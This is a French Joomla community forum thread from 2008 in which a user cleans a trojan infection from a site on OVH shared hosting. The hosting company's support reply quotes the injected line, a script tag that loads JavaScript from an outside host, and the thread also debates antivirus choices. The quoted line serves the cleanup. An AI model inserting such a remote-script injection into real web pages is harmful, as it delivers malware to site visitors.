Joomladay francophone 2018 à Paris 18 et 19 mai

Cheval de troie sur mon site : comment m'en débarrasser ?

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • Cheval de troie sur mon site : comment m'en débarrasser ?

    On m'a signalé ceci par mail :
    Pour info, voici les infos que j'ai à propos de votre "infection" - cela vous aidera sans doute pour la nettoyer :

    Nom du fichier :http://www.alab.fr/\unp28617791
    Nom du logiciel malveillant : JS:Agent-BA [Trj]
    Type de logiciel malveillant : Cheval de Troie
    Version VPS : 080923-0, 23/09/2008
    Bonjour, comment dois je m'y prendre pour m'en débarrasser ?

    Merci d'avance de votre aide.

  • #2
    salut, es tu sur un serveur mutualisé ou dédié ?
    mutualisé => ton prestataire doit assurer le travail pour virer cela, je pense.
    dans le cas d'un dédié, cela dépendras si tu a une info-gérance avec ce prestataire ou non?
    Témoignages de vos sites hackés

    Commentaire


    • #3
      L'association est chez OVH.

      Commentaire


      • #4
        serveur dédié ou mutualisé, je pense mutualisé, vous n'êtes pi être pas seul a voir un virus sur votre site, il est présent sur le serveur
        Témoignages de vos sites hackés

        Commentaire


        • #5
          On a un contrat dans le mutualisé pour le serveur.

          Je viens de retourner sur le manager, il y avait le contrat du nom de domaine à cocher deux autres contrats étaient déjà cochés comme mutualisé.

          Commentaire


          • #6
            contacter le support technique ovh par mail (gratuit) réponse dans la journée si vous attendez pas 18h envoyer un mail avec un fichier joint une capture d'écran qui montre que votre site a un virus.
            Témoignages de vos sites hackés

            Commentaire


            • #7
              Voilà je leur écris via le support, j'attends leur réponse.

              Je vous avertis dès que j'ai une réponse, et merci pour votre aide.

              Commentaire


              • #8
                Voilà ce qu'on m'a répondu :
                Bonjour,

                Dans le code de votre page d'index, vous avez une ligne de code qui est la suivante:

                <script src="http://trustedtop10.com/nizko4.js"></script><script>function

                Je vous invite à supprimer cette dernière car cette ligne qui est à l'origine du virus.

                Je vous souhaite une bonne journée.

                Je reste à votre disposition pour tout renseignement complémentaire.

                Cordialement,Aurelien L.
                J'ai remplacé mon index.php du répertoire "www" par celui que j'avais en local sur mon pc, après l'avoir ouvert avec "context" pour voir si la ligne de code indiqué au dessus n'y était pas.

                Je pensais avoir résolue le problème mais celui qui m'a signalé le problème m'a répondu ça :
                Bonjour,

                Je suis désolé, mais j'ai toujours l'alerte virus

                Néanmoins, j'ai testé votre site depuis plusieurs ordi différents, et
                seul mon pc avec Avast installé me le signale.

                Peut-être que la persistance du problème vient de la mise en cache par
                notre routeur, pour savoir cela il faudra que j'attende quelques jours.
                Néanmoins, si vous êtes en mesure de détecter le troyen de votre coté
                (en installant avast sur votre ordi), je pense que son éradication n'en
                sera que plus sûre.

                Cordialement,
                Christophe

                Commentaire


                • #9
                  Envoyé par Waldham Voir le message
                  Voilà ce qu'on m'a répondu :


                  J'ai remplacé mon index.php du répertoire "www" par celui que j'avais en local sur mon pc, après l'avoir ouvert avec "context" pour voir si la ligne de code indiqué au dessus n'y était pas.

                  Je pensais avoir résolue le problème mais celui qui m'a signalé le problème m'a répondu ça :
                  bonjour

                  je me permets de rentrer de plein pieds dans ce sujet car une énorme absurdité t'es suggérée !!!

                  déjà pour commencer AVAST n'est plus une référence en matière d'ANTI-VIRUS donc ne l'installe pas car ce n'est plus ce que c'était , il est vrai qu'AVAST a eu sa période de gloire à l'époque ou nous n'avions que des payants à nous mettre sous la main mais plus maintenant le meillheur anti virus gratuit du moment est ANTIVIR , beaucoup plus performant et léger que ne sera jamais AVAST .

                  de la même famille en payant NOD32

                  donc pour detecter le fichier infecté tu fais la chose suivante , t'installes ANTIVIR et tu rapatries tout le contenu de ton site, si t'as un script vérolé il va trouver , c'est avec lui que j'ai identifié le script sur le FTP de Tial qui avait un backdoor d'installé.

                  dans tous les cas de figure si ANTIVIR te le detecte, il ne le laissera pas être écrit sur ton disque même si ce script php ne te fera aucun dégat, il va juste identifié le fichier infecté et t'en donné la signature du virus trouvé .

                  tu pourras donc procéder à l'éradication directement sur ton FTP et si le fichier concerné est un fichier joomla tu n'aura plus qu'à mettre celui contenu dans le pack joomla de ta version.

                  Dans tous les cas ton problème ne doit pas être pris à la légère, ton site risque fort d'être classifié dans les blaclkistés alors plus vite tu vas résoudre et mieux cela sera.

                  Pour l'histoire de l'antivirus tu ne l'installe que si t'as pas d'antivirus déjà d'installé si t'as déjà AVAST tu le laisse et tu verras bien ce qu'il te découvre , si t'en a pas t'installes ANTIVIR et si AVAST ou celui que tu as ne te trouve rien tu le desinstalles ou celui qui est Installé et t'installes ANTIVIR.

                  ICi ce n'est pas une histoire de qui est le meilleur comme anti-virus, c'est tout simplement une constatation et tests effectuées par des professionnels en matière d'anti-virus.

                  @+
                  Dernière édition par Thorhax à 26/09/2008, 15h57
                  adaptations|conceptions

                  Commentaire


                  • #10
                    Bonjour,
                    j'ai déjà Antivir comme antivirus à la base.

                    Je viens d'installer Avast, et il me détecte ce cheval de troie quand je vais sur mon site.

                    Avant que tu m'écrives, j'ai rapatrié le site dans un répertoire et je l'ai fait scanné par Antivir :
                    _ Il me signale comme chose louche dans de nombreux index.html :
                    HEUR/HTML.Malware

                    _ sdf.php

                    _ Je sais plus si c'est Avast ou antivir qui me dit que dans www/components/com_expo il y a :
                    VBS : Maware gen

                    est ce que cela veut dire que tous les fichiers index.html ?
                    Dernière édition par Waldham à 26/09/2008, 16h39

                    Commentaire


                    • #11
                      Envoyé par Waldham Voir le message
                      Bonjour,
                      j'ai déjà Antivir comme antivirus à la base.

                      Je viens d'installer Avast, et il me détecte ce cheval de troie quand je vais sur mon site.

                      Avant que tu m'écrives, j'ai rapatrié le site dans un répertoire et je l'ai fait scanné par Antivir :
                      _ Il me signale comme chose louche dans de nombreux index.html :
                      HEUR/HTML.Malware

                      _ sdf.php

                      _ Je sais plus si c'est Avast ou antivir qui me dit que dans www/components/com_expo il y a :
                      VBS : Maware gen
                      bon déjà si l'infection est généralisée faut commencer par touver le script qui est entrain de reecrire les index .

                      et donc prevoir une reinstallation neuve de ton Joomla, c'est qui ton hébergeur ?
                      adaptations|conceptions

                      Commentaire


                      • #12
                        Envoyé par Thorhax Voir le message
                        bonjour

                        je me permets de rentrer de plein pieds dans ce sujet car une énorme absurdité t'es suggérée !!!

                        déjà pour commencer AVAST n'est plus une référence en matière d'ANTI-VIRUS donc ne l'installe pas car ce n'est plus ce que c'était , il est vrai qu'AVAST a eu sa période de gloire à l'époque ou nous n'avions que des payants à nous mettre sous la main mais plus maintenant le meillheur anti virus gratuit du moment est ANTIVIR , beaucoup plus performant et léger que ne sera jamais AVAST .

                        de la même famille en payant NOD32

                        donc pour detecter le fichier infecté tu fais la chose suivante , t'installes ANTIVIR et tu rapatries tout le contenu de ton site, si t'as un script vérolé il va trouver , c'est avec lui que j'ai identifié le script sur le FTP de Tial qui avait un backdoor d'installé.

                        dans tous les cas de figure si ANTIVIR te le detecte, il ne le laissera pas être écrit sur ton disque même si ce script php ne te fera aucun dégat, il va juste identifié le fichier infecté et t'en donné la signature du virus trouvé .

                        tu pourras donc procéder à l'éradication directement sur ton FTP et si le fichier concerné est un fichier joomla tu n'aura plus qu'à mettre celui contenu dans le pack joomla de ta version.

                        Dans tous les cas ton problème ne doit pas être pris à la légère, ton site risque fort d'être classifié dans les blaclkistés alors plus vite tu vas résoudre et mieux cela sera.

                        Pour l'histoire de l'antivirus tu ne l'installe que si t'as pas d'antivirus déjà d'installé si t'as déjà AVAST tu le laisse et tu verras bien ce qu'il te découvre , si t'en a pas t'installes ANTIVIR et si AVAST ou celui que tu as ne te trouve rien tu le desinstalles ou celui qui est Installé et t'installes ANTIVIR.

                        ICi ce n'est pas une histoire de qui est le meilleur comme anti-virus, c'est tout simplement une constatation et tests effectuées par des professionnels en matière d'anti-virus.

                        @+
                        Bonjour,

                        J'adore les partis pris, les test de sécurité patati et patata.

                        Que avast soit plus lourd cela est normal, car de base il propose de loin beaucoup plus de protection dans sa version "gratuite", que ne le fais antivir.
                        Ensuite ANTIVIR lui ne connais pas ce que cela veux dire être international concernant les langues pour les utilisateurs.

                        Ensuite ne pas confondre le moteur ANTIVIR que l'on peut trouver dans les firewall matériel et autre routeur, cela n'a rien à voir.
                        ANTIVIR "free" n'arrive même pas à la cheville de leurs grand frère Payant et encore moins des version intégré au firewall et routeur.

                        Cela me fais vraiment rire depuis des années les soit disant "test" fais par des soit disant expert.
                        Quel que soit les sites que l'on visite à ce sujet aucun n'est d'accord sur qui est le plus puissant, efficace, ect ect ...

                        Maintenant si on compare les fonctionnalitées réellement fournis par avast gratuitement et celle fournis par ANTIVIR
                        C'est tous bonnement incomparable, Avast propose 90% de ses fonctionnalités dans sa version "gratuite" alors que ANTIVIR ne propose que 20% de la totalité de ses fonctionnalités. Voir ICI

                        Je sais certain vont dire vaux mieux avoir peut et efficace que beaucoup et mauvais.
                        Avast n'a vraiment pas à rougir de ses résultats dans les différents teste publié tous site confondus, ses résultat sont honorable et stable.
                        Pas le cas de tous les autres !!

                        Autre information à propos d'avast une fois installer, et si on possede une connexion internet, Avast n'attend pas 1 mois pour faire la mise à jour de sa base de connaissance des virus, les mises à jour peuvent être d'une par jour, voir deux dans certain cas pour les plus fréquente.
                        Sinon cela tourne à une par semaine et tous cela gratuitement.

                        Pour conclure il n'y auras jamais d'anti-virus efficace à 100% de toute façon, mais je préfère de loin la politique d'avast qui est d'offrir gratuitement le meilleur service de protection aux particuliers, que de les prendres en otage comme le font tous les autres. Car avec les autres si on veux vraiment avoir une bonne protection, on est obliger de PAYER, tous simplement.
                        Cordialement,
                        Theking83
                        Webmaster
                        www.ltdw.net
                        Pas de support par MP je réponds aux questions exclusivement posées sur le forum.

                        Commentaire


                        • #13
                          C'est OVH comme indiqué dans ma page précédente.

                          Commentaire


                          • #14
                            désolé j'ai de gros soucis de connexion en ce moment

                            theking83 on vas pas faire un débat là dessus en terme de comparatifs

                            le 20% sont amplement suffisant pour faire le boulot d'un AV

                            AntiVir protection from viruses, worms and Trojans
                            AntiDialer protection against expensive dialers
                            AntiRootkit protection from hidden rootkits
                            Faster Scanning up to 20% faster
                            AntiPhishing protection from phishing

                            l'avantage réside dans le fait Q'antivir dans sa version gratuite possède un anti-rootkit et methode de detection heuristique tout ça pour une extrème légèreté de conso ressources comparé à d'autre AV qui te bouffent toute la mémoire.

                            l'unique inconvénient il n'est qu'en Anglais ou allemand , mais bon ça fait 2 ans que j'ai lâché AVAST pour ANTIVIR et mon system d'exploitation windows m'en remercie

                            POur revenir à nos moutons

                            Waldham fait tourné le script qui est dans ce post il vient justement du forum OVH , cela va te permettre de savoir qui écrit quoi et ou

                            tu le mets à la racine de ton site et tu nommes le fichiers verif.php puis tu l'appelles par http://ton-site.fr/verif.php

                            tu mettras 1 dans le nombre de jours
                            puis tu executes la recherche , regardes avec attention tous les fichiers et leur extentions
                            Dernière édition par Thorhax à 26/09/2008, 17h18
                            adaptations|conceptions

                            Commentaire


                            • #15
                              J'ai copié collé ton code et j'ai nommé le fichier verif.php.

                              Je l'ai transféré dans mon répertoire 'www' via ftp.

                              Je l'ai lancé en faisant : http://www.alab.fr/verif.php

                              J'ai testé chaque répertoire en n'oubliant pas de mettre '/' à la fin avant de cliquer sur le bouton vérifier.

                              J'ai fait tous les répertoires et ça ne me signale rien.

                              Edit : faut que j'indique une date.

                              J'ai essayé 10 jours et ça m'affiche ça :
                              Texte à afficher (cliquer ici)
                              Dernière édition par Waldham à 26/09/2008, 17h32

                              Commentaire

                              Annonce

                              Réduire
                              1 sur 2 < >

                              C'est [Réglé] et on n'en parle plus ?

                              A quoi ça sert ?
                              La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

                              Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

                              Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
                              Comment ajouter la mention [Réglé] à votre discussion ?
                              1 - Aller sur votre discussion et éditer votre premier message :


                              2 - Cliquer sur la liste déroulante Préfixe.

                              3 - Choisir le préfixe [Réglé].


                              4 - Et voilà… votre discussion est désormais identifiée comme réglée.

                              2 sur 2 < >

                              Assistance au forum - Outil de publication d'infos de votre site

                              Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

                              Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

                              Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

                              UTILISER À VOS PROPRES RISQUES :
                              L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

                              Problèmes connus :
                              FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

                              Installation :

                              1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

                              Archive zip : https://github.com/AFUJ/FPA/zipball/master

                              2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

                              3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

                              4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

                              5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

                              6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
                              et remplacer www. votresite .com par votre nom de domaine


                              Exemples:
                              Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/
                              Pour executer le script: http://www..com/fpa-fr.php

                              Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/cms/
                              Pour executer le script: http://www..com/cms/fpa-fr.php

                              En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

                              Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
                              Voir plus
                              Voir moins
                              Travaille ...
                              X